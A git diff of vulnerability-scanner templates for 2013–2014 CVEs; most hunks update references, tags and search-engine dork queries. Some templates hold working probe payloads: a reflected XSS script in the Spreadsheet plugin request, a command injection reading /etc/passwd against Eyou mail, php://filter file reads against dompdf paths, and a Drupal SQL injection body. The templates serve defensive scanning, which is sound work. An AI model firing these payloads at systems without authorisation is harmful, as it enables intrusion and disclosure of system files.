diff --git a/cves/2013/CVE-2013-5528.yaml b/cves/2013/CVE-2013-5528.yaml
index cd71081988..ce41d2e418 100644
--- a/cves/2013/CVE-2013-5528.yaml
+++ b/cves/2013/CVE-2013-5528.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/40887
     - https://nvd.nist.gov/vuln/detail/CVE-2014-3120
+    - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528
+    - http://web.archive.org/web/20210122130958/https://www.securityfocus.com/bid/62960/
   classification:
     cve-id: CVE-2013-5528
-  tags: cve,cve2013,lfi,cisco
+  tags: cve,cve2013,lfi,cisco,edb
 
 requests:
   - method: GET
diff --git a/cves/2013/CVE-2013-5979.yaml b/cves/2013/CVE-2013-5979.yaml
index 7ad29aa3ce..cdf9722925 100644
--- a/cves/2013/CVE-2013-5979.yaml
+++ b/cves/2013/CVE-2013-5979.yaml
@@ -8,11 +8,10 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/26955
     - https://nvd.nist.gov/vuln/detail/CVE-2013-5979
-    - https://www.cvedetails.com/cve/CVE-2013-5979
     - https://bugs.launchpad.net/xibo/+bug/1093967
   classification:
     cve-id: CVE-2013-5979
-  tags: cve,cve2013,lfi
+  tags: cve,cve2013,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2013/CVE-2013-6281.yaml b/cves/2013/CVE-2013-6281.yaml
new file mode 100644
index 0000000000..2f67a808c3
--- /dev/null
+++ b/cves/2013/CVE-2013-6281.yaml
@@ -0,0 +1,49 @@
+id: CVE-2013-6281
+
+info:
+  name: WordPress Spreadsheet - Cross-Site Scripting
+  author: random-robbie
+  severity: medium
+  description: |
+    WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php.
+  reference:
+    - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
+    - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/
+    - https://wordpress.org/plugins/dhtmlxspreadsheet/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
+    - https://nvd.nist.gov/vuln/detail/CVE-2013-6281
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2013-6281
+    cwe-id: CWE-79
+  metadata:
+    google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet
+    verified: "true"
+  tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin
+
+requests:
+  - raw:
+      - |
+        GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "page: '<script>alert(document.domain)</script>'"
+          - "dhx_rel_path"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2013/CVE-2013-7091.yaml b/cves/2013/CVE-2013-7091.yaml
index 2a81348200..4b85478df5 100644
--- a/cves/2013/CVE-2013-7091.yaml
+++ b/cves/2013/CVE-2013-7091.yaml
@@ -9,9 +9,10 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2013-7091
     - https://www.exploit-db.com/exploits/30085
     - https://www.exploit-db.com/exploits/30472
+    - http://www.exploit-db.com/exploits/30085
   classification:
     cve-id: CVE-2013-7091
-  tags: cve,cve2013,zimbra,lfi
+  tags: zimbra,lfi,edb,cve,cve2013
 
 requests:
   - method: GET
diff --git a/cves/2013/CVE-2013-7240.yaml b/cves/2013/CVE-2013-7240.yaml
index f19be60b3e..50edd26a43 100644
--- a/cves/2013/CVE-2013-7240.yaml
+++ b/cves/2013/CVE-2013-7240.yaml
@@ -9,12 +9,15 @@ info:
     - https://www.exploit-db.com/exploits/38936
     - https://nvd.nist.gov/vuln/detail/CVE-2013-7240
     - https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/
+    - http://seclists.org/oss-sec/2013/q4/570
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2013-7240
     cwe-id: CWE-22
-  tags: cve,cve2013,wordpress,wp-plugin,lfi
+  metadata:
+    google-query: inurl:"/wp-content/plugins/advanced-dewplayer/"
+  tags: wp-plugin,lfi,edb,seclists,cve,cve2013,wordpress
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-10037.yaml b/cves/2014/CVE-2014-10037.yaml
index fc7bb4f818..2dc322050b 100644
--- a/cves/2014/CVE-2014-10037.yaml
+++ b/cves/2014/CVE-2014-10037.yaml
@@ -7,11 +7,11 @@ info:
   description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
   reference:
     - https://www.exploit-db.com/exploits/30865
-    - https://www.cvedetails.com/cve/CVE-2014-10037
     - https://nvd.nist.gov/vuln/detail/CVE-2014-10037
+    - http://www.exploit-db.com/exploits/30865
   classification:
     cve-id: CVE-2014-10037
-  tags: cve,cve2014,lfi
+  tags: cve,cve2014,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-1203.yaml b/cves/2014/CVE-2014-1203.yaml
new file mode 100644
index 0000000000..d8e32964a8
--- /dev/null
+++ b/cves/2014/CVE-2014-1203.yaml
@@ -0,0 +1,39 @@
+id: CVE-2014-1203
+
+info:
+  name: Eyou E-Mail <3.6 - Remote Code Execution
+  author: pikpikcu
+  severity: critical
+  description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function.
+  reference:
+    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-1203
+    - http://seclists.org/fulldisclosure/2014/Jan/32
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2014-1203
+    cwe-id: CWE-77
+  tags: seclists,rce,eyou
+
+requests:
+  - raw:
+      - |
+        POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        type='|cat /etc/passwd||'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/01
diff --git a/cves/2014/CVE-2014-2321.yaml b/cves/2014/CVE-2014-2321.yaml
index 7040319972..7f328db084 100644
--- a/cves/2014/CVE-2014-2321.yaml
+++ b/cves/2014/CVE-2014-2321.yaml
@@ -10,6 +10,7 @@ info:
     - https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/
     - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/
     - https://nvd.nist.gov/vuln/detail/CVE-2014-2321
+    - http://www.kb.cert.org/vuls/id/600724
   classification:
     cve-id: CVE-2014-2321
   tags: iot,cve,cve2014,zte
diff --git a/cves/2014/CVE-2014-2323.yaml b/cves/2014/CVE-2014-2323.yaml
index e65288f75d..8b91e28223 100644
--- a/cves/2014/CVE-2014-2323.yaml
+++ b/cves/2014/CVE-2014-2323.yaml
@@ -9,12 +9,13 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-2323
     - https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
     - http://www.lighttpd.net/2014/3/12/1.4.35/
+    - http://seclists.org/oss-sec/2014/q1/561
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2014-2323
     cwe-id: CWE-89
-  tags: cve,cve2014,sqli,lighttpd,injection
+  tags: lighttpd,injection,seclists,cve,cve2014,sqli
 
 requests:
   - raw:
diff --git a/cves/2014/CVE-2014-2383.yaml b/cves/2014/CVE-2014-2383.yaml
index 901cc9a100..8ca6ae1010 100644
--- a/cves/2014/CVE-2014-2383.yaml
+++ b/cves/2014/CVE-2014-2383.yaml
@@ -1,31 +1,45 @@
 id: CVE-2014-2383
 
 info:
-  name: Arbitrary file read in dompdf < v0.6.0
-  author: 0x_Akoko
+  name: Dompdf < v0.6.0 - Local File Inclusion
+  author: 0x_Akoko,akincibor,ritikchaddha
   severity: high
-  description: A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
+  description: |
+    A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2014-2383
     - https://www.exploit-db.com/exploits/33004
+    - http://seclists.org/fulldisclosure/2014/Apr/258
+    - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/
+    - https://wpscan.com/vulnerability/1d64d0cb-6b71-47bb-8807-7c8350922582
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-2383
   classification:
     cve-id: CVE-2014-2383
   metadata:
-    win-payload: /dompdf.php?input_file=C:/windows/win.ini
-    unix-payload: /dompdf.php?input_file=/etc/passwd
-  tags: cve,cve2014,dompdf,lfi
+    verified: "true"
+  tags: cve,lfi,wp-plugin,wpscan,cve2014,dompdf,wordpress,wp,edb,seclists
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
-      - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
-      - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
-      - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"
+      - "{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
 
     stop-at-first-match: true
     matchers-condition: and
     matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
       - type: word
         words:
           - "application/pdf"
@@ -37,4 +51,4 @@ requests:
         status:
           - 200
 
-# Enhanced by mp on 2022/02/24
+# Enhanced by mp on 2022/08/06
diff --git a/cves/2014/CVE-2014-2908.yaml b/cves/2014/CVE-2014-2908.yaml
index 5c102a88a4..9322e79732 100644
--- a/cves/2014/CVE-2014-2908.yaml
+++ b/cves/2014/CVE-2014-2908.yaml
@@ -9,10 +9,11 @@ info:
     - https://www.exploit-db.com/exploits/44687
     - https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf
     - https://nvd.nist.gov/vuln/detail/CVE-2014-2908
+    - http://ics-cert.us-cert.gov/advisories/ICSA-14-114-02
+  remediation: Upgrade to v4.0 or later.
   classification:
     cve-id: CVE-2014-2908
-  remediation: Upgrade to v4.0 or later.
-  tags: cve,cve2014,xss,siemens
+  tags: cve,cve2014,xss,siemens,edb
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-2962.yaml b/cves/2014/CVE-2014-2962.yaml
index 9ce8d328b6..2c2c67d121 100644
--- a/cves/2014/CVE-2014-2962.yaml
+++ b/cves/2014/CVE-2014-2962.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.kb.cert.org/vuls/id/774788
     - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l
+    - http://www.kb.cert.org/vuls/id/774788
+    - http://www.belkin.com/us/support-article?articleNum=109400
+  remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources.
   classification:
     cve-id: CVE-2014-2962
-  remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources.
   tags: cve,cve2014,lfi,router,firmware,traversal
 
 requests:
diff --git a/cves/2014/CVE-2014-3120.yaml b/cves/2014/CVE-2014-3120.yaml
index 3c3a345c84..66375d0aeb 100644
--- a/cves/2014/CVE-2014-3120.yaml
+++ b/cves/2014/CVE-2014-3120.yaml
@@ -10,9 +10,10 @@ info:
     - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
     - https://www.elastic.co/blog/logstash-1-4-3-released
     - https://nvd.nist.gov/vuln/detail/CVE-2014-3120
+    - http://bouk.co/blog/elasticsearch-rce/
   classification:
     cve-id: CVE-2014-3120
-  tags: cve,cve2014,elastic,rce,elasticsearch
+  tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic
 
 requests:
   - raw:
diff --git a/cves/2014/CVE-2014-3206.yaml b/cves/2014/CVE-2014-3206.yaml
index 956be1aeb7..64af96912b 100644
--- a/cves/2014/CVE-2014-3206.yaml
+++ b/cves/2014/CVE-2014-3206.yaml
@@ -8,12 +8,13 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-3206
     - https://www.exploit-db.com/exploits/33159
+    - https://www.exploit-db.com/exploits/33159/
   classification:
-    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2014-3206
     cwe-id: CWE-20
-  tags: cve,cve2014,seagate,rce
+  tags: cve,cve2014,seagate,rce,edb
 
 requests:
   - raw:
diff --git a/cves/2014/CVE-2014-3704.yaml b/cves/2014/CVE-2014-3704.yaml
index caa96466e7..76fd15724b 100644
--- a/cves/2014/CVE-2014-3704.yaml
+++ b/cves/2014/CVE-2014-3704.yaml
@@ -9,32 +9,37 @@ info:
     - https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql
     - https://nvd.nist.gov/vuln/detail/CVE-2014-3704
     - https://www.drupal.org/SA-CORE-2014-005
-    - http://www.exploit-db.com/exploits/34984
-    - http://www.exploit-db.com/exploits/34992
-    - http://www.exploit-db.com/exploits/34993
-    - http://www.exploit-db.com/exploits/35150
+    - https://www.exploit-db.com/exploits/34984
+    - https://www.exploit-db.com/exploits/34992
+    - https://www.exploit-db.com/exploits/34993
+    - https://www.exploit-db.com/exploits/35150
+  remediation: Upgrade to Drupal core 7.32 or later.
   classification:
     cve-id: CVE-2014-3704
-  remediation: Upgrade to Drupal core 7.32 or later.
-  tags: cve,cve2014,drupal,sqli
+  metadata:
+    shodan-query: http.component:"drupal"
+  tags: edb,cve,cve2014,drupal,sqli
+
+variables:
+  num: "999999999"
 
 requests:
   - method: POST
     path:
       - "{{BaseURL}}/?q=node&destination=node"
-    body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a'
+    body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a'
 
     matchers-condition: and
     matchers:
+      - type: word
+        words:
+          - "PDOException"
+          - '{{md5({{num}})}}'
+        condition: and
+        part: body
+
       - type: status
         status:
           - 500
 
-      - type: word
-        words:
-          - "PDOException"
-          - "e807f1fcf82d132f9bb018ca6738a19f"
-        condition: and
-        part: body
-
 # Enhanced by mp on 2022/02/24
diff --git a/cves/2014/CVE-2014-3744.yaml b/cves/2014/CVE-2014-3744.yaml
index 7473ec1411..7ea04e9257 100644
--- a/cves/2014/CVE-2014-3744.yaml
+++ b/cves/2014/CVE-2014-3744.yaml
@@ -9,6 +9,7 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-3744
     - https://github.com/advisories/GHSA-69rr-wvh9-6c4q
     - https://snyk.io/vuln/npm:st:20140206
+    - https://nodesecurity.io/advisories/st_directory_traversal
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml
index 87845c7740..ced636d80d 100644
--- a/cves/2014/CVE-2014-4210.yaml
+++ b/cves/2014/CVE-2014-4210.yaml
@@ -1,7 +1,7 @@
 id: CVE-2014-4210
 
 info:
-  name: Weblogic SSRF in SearchPublicRegistries.jsp
+  name: Oracle Weblogic - SSRF in SearchPublicRegistries.jsp
   author: princechaddha
   severity: medium
   description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.
@@ -9,6 +9,7 @@ info:
     - https://www.oracle.com/security-alerts/cpujul2014.html
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4210
     - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
+    - http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html
   classification:
     cve-id: CVE-2014-4210
   tags: cve,cve2014,weblogic,oracle,ssrf,oast
diff --git a/cves/2014/CVE-2014-4513.yaml b/cves/2014/CVE-2014-4513.yaml
index 416cf007fb..cda22cdb15 100644
--- a/cves/2014/CVE-2014-4513.yaml
+++ b/cves/2014/CVE-2014-4513.yaml
@@ -1,14 +1,17 @@
 id: CVE-2014-4513
 
 info:
-  name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting
+  name: ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4513
+    - http://codevigilant.com/disclosure/wp-plugin-activehelper-livehelp-a3-cross-site-scripting-xss
   classification:
     cve-id: CVE-2014-4513
+  metadata:
+    google-query: inurl:"/wp-content/plugins/activehelper-livehelp"
   tags: cve,cve2014,wordpress,xss,wp-plugin
 
 requests:
diff --git a/cves/2014/CVE-2014-4535.yaml b/cves/2014/CVE-2014-4535.yaml
index f5cc488e4e..292351960a 100644
--- a/cves/2014/CVE-2014-4535.yaml
+++ b/cves/2014/CVE-2014-4535.yaml
@@ -1,19 +1,20 @@
 id: CVE-2014-4535
 
 info:
-  name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
+  name: Import Legacy Media <= 0.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
   reference:
     - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4535
+    - http://codevigilant.com/disclosure/wp-plugin-import-legacy-media-a3-cross-site-scripting-xss
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2014-4535
     cwe-id: CWE-79
-  tags: cve,cve2014,wordpress,wp-plugin,xss
+  tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-4536.yaml b/cves/2014/CVE-2014-4536.yaml
index 0781e472a9..3bc8f45b92 100644
--- a/cves/2014/CVE-2014-4536.yaml
+++ b/cves/2014/CVE-2014-4536.yaml
@@ -1,19 +1,23 @@
 id: CVE-2014-4536
 
 info:
-  name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting
+  name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.
   reference:
     - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4536
+    - http://wordpress.org/plugins/infusionsoft/changelog
+    - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2014-4536
     cwe-id: CWE-79
-  tags: cve,cve2014,wordpress,wp-plugin,xss
+  metadata:
+    google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
+  tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-4539.yaml b/cves/2014/CVE-2014-4539.yaml
index 6918732634..94b663a884 100644
--- a/cves/2014/CVE-2014-4539.yaml
+++ b/cves/2014/CVE-2014-4539.yaml
@@ -1,19 +1,20 @@
 id: CVE-2014-4539
 
 info:
-  name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting
+  name: Movies <= 0.6 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
   reference:
     - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4539
+    - http://codevigilant.com/disclosure/wp-plugin-movies-a3-cross-site-scripting-xss
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2014-4539
     cwe-id: CWE-79
-  tags: cve,cve2014,wordpress,wp-plugin,xss
+  tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-4544.yaml b/cves/2014/CVE-2014-4544.yaml
index d9ba1cbb7f..939d1ca226 100644
--- a/cves/2014/CVE-2014-4544.yaml
+++ b/cves/2014/CVE-2014-4544.yaml
@@ -1,19 +1,20 @@
 id: CVE-2014-4544
 
 info:
-  name: Podcast Channels < 0.28 - Unauthenticated Reflected Cross-Site Scripting
+  name: Podcast Channels < 0.28 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.
   reference:
     - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4544
+    - http://codevigilant.com/disclosure/wp-plugin-podcast-channels-a3-cross-site-scripting-xss
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2014-4544
     cwe-id: CWE-79
-  tags: cve,cve2014,wordpress,wp-plugin,xss
+  tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-4550.yaml b/cves/2014/CVE-2014-4550.yaml
index ea0eea4603..e9a6830b42 100644
--- a/cves/2014/CVE-2014-4550.yaml
+++ b/cves/2014/CVE-2014-4550.yaml
@@ -1,19 +1,22 @@
 id: CVE-2014-4550
 
 info:
-  name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected Cross-Site Scripting
+  name: Shortcode Ninja <= 1.4 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter.
   reference:
     - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4550
+    - http://codevigilant.com/disclosure/wp-plugin-shortcode-ninja-a3-cross-site-scripting-xss
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2014-4550
     cwe-id: CWE-79
-  tags: cve,cve2014,wordpress,wp-plugin,xss
+  metadata:
+    google-query: inurl:"/wp-content/plugins/shortcode-ninja"
+  tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-4558.yaml b/cves/2014/CVE-2014-4558.yaml
index db179433f6..1566035c02 100644
--- a/cves/2014/CVE-2014-4558.yaml
+++ b/cves/2014/CVE-2014-4558.yaml
@@ -1,19 +1,20 @@
 id: CVE-2014-4558
 
 info:
-  name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected Cross-Site Scripting
+  name: WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.
   reference:
     - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4558
+    - http://codevigilant.com/disclosure/wp-plugin-swipehq-payment-gateway-woocommerce-a3-cross-site-scripting-xss
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2014-4558
     cwe-id: CWE-79
-  tags: cve,cve2014,wordpress,wp-plugin,xss,woocommerce
+  tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce,unauth
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-4561.yaml b/cves/2014/CVE-2014-4561.yaml
index 9308c5b025..878abafb7a 100644
--- a/cves/2014/CVE-2014-4561.yaml
+++ b/cves/2014/CVE-2014-4561.yaml
@@ -1,19 +1,20 @@
 id: CVE-2014-4561
 
 info:
-  name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected Cross-Site Scripting
+  name: Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.
   reference:
     - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4561
+    - http://codevigilant.com/disclosure/wp-plugin-ultimate-weather-plugin-a3-cross-site-scripting-xss/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2014-4561
     cwe-id: CWE-79
-  tags: cve,cve2014,wordpress,wp-plugin,xss,weather
+  tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth
 
 requests:
   - method: GET
diff --git a/cves/2014/CVE-2014-4592.yaml b/cves/2014/CVE-2014-4592.yaml
index 75c8030033..35eb2a7082 100644
--- a/cves/2014/CVE-2014-4592.yaml
+++ b/cves/2014/CVE-2014-4592.yaml
@@ -1,19 +1,22 @@
 id: CVE-2014-4592
 
 info:
-  name: WP Planet <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
+  name: WP Planet <= 0.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.
   reference:
     - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3
     - https://nvd.nist.gov/vuln/detail/CVE-2014-4592
